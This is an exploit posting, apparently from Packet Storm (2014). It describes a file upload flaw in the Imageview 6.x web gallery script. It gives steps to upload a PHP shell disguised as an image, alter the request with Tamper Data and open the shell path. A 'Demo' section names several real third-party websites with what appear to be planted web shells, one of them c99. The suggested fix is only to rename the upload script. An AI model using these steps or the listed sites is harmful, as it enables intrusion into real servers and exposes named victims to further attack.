Imageview 6.x Shell Upload

2014-01-21T00:00:00
ID PACKETSTORM:124865
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2014-01-21T00:00:00

Description

                                        
                                            `[+] Author: TUNISIAN CYBER  
[+] Exploit Title: Imageview File Upload vulnerability  
[+] Date: 20-01-2014  
[+] Category: WebApp  
[+] Google Dork: :  
[+] Tested on: KaliLinux  
[+] Friendly Sites: na3il.com,th3-creative.com  
#############################################################  
+Exploit:  
Imageview Suffers from a File Upload Vulnerability which allows the attacker  
to upload a PHP File.  
  
+P.O.C:  
127.0.0.1/[PATH]/upload.php  
Upload as shell.php.[img extension jpg png gif]  
Change it using temper data  
Shell Path:  
127.0.0.1/[PATH]/albums/shell.php  
  
+Demo:  
http://indianayouthballet.com/photos/upload.php  
http://indianayouthballet.com/photos/albums/a0a0a.php  
http://www.schaefer-swantow.de/Galerie/upload.php  
http://www.schaefer-swantow.de/Galerie/albums/c99.php  
http://www.rappel-zappel.de/galerie/upload.php  
  
+Fix:  
There's no fix from the script's owner but change "upload.php"'s name or path.  
########################################################################################  
Greets to: XMaX-tn, N43il HacK3r, XtechSEt  
Sec4Ever Members:  
DamaneDz  
UzunDz  
GEOIX  
########################################################################################  
`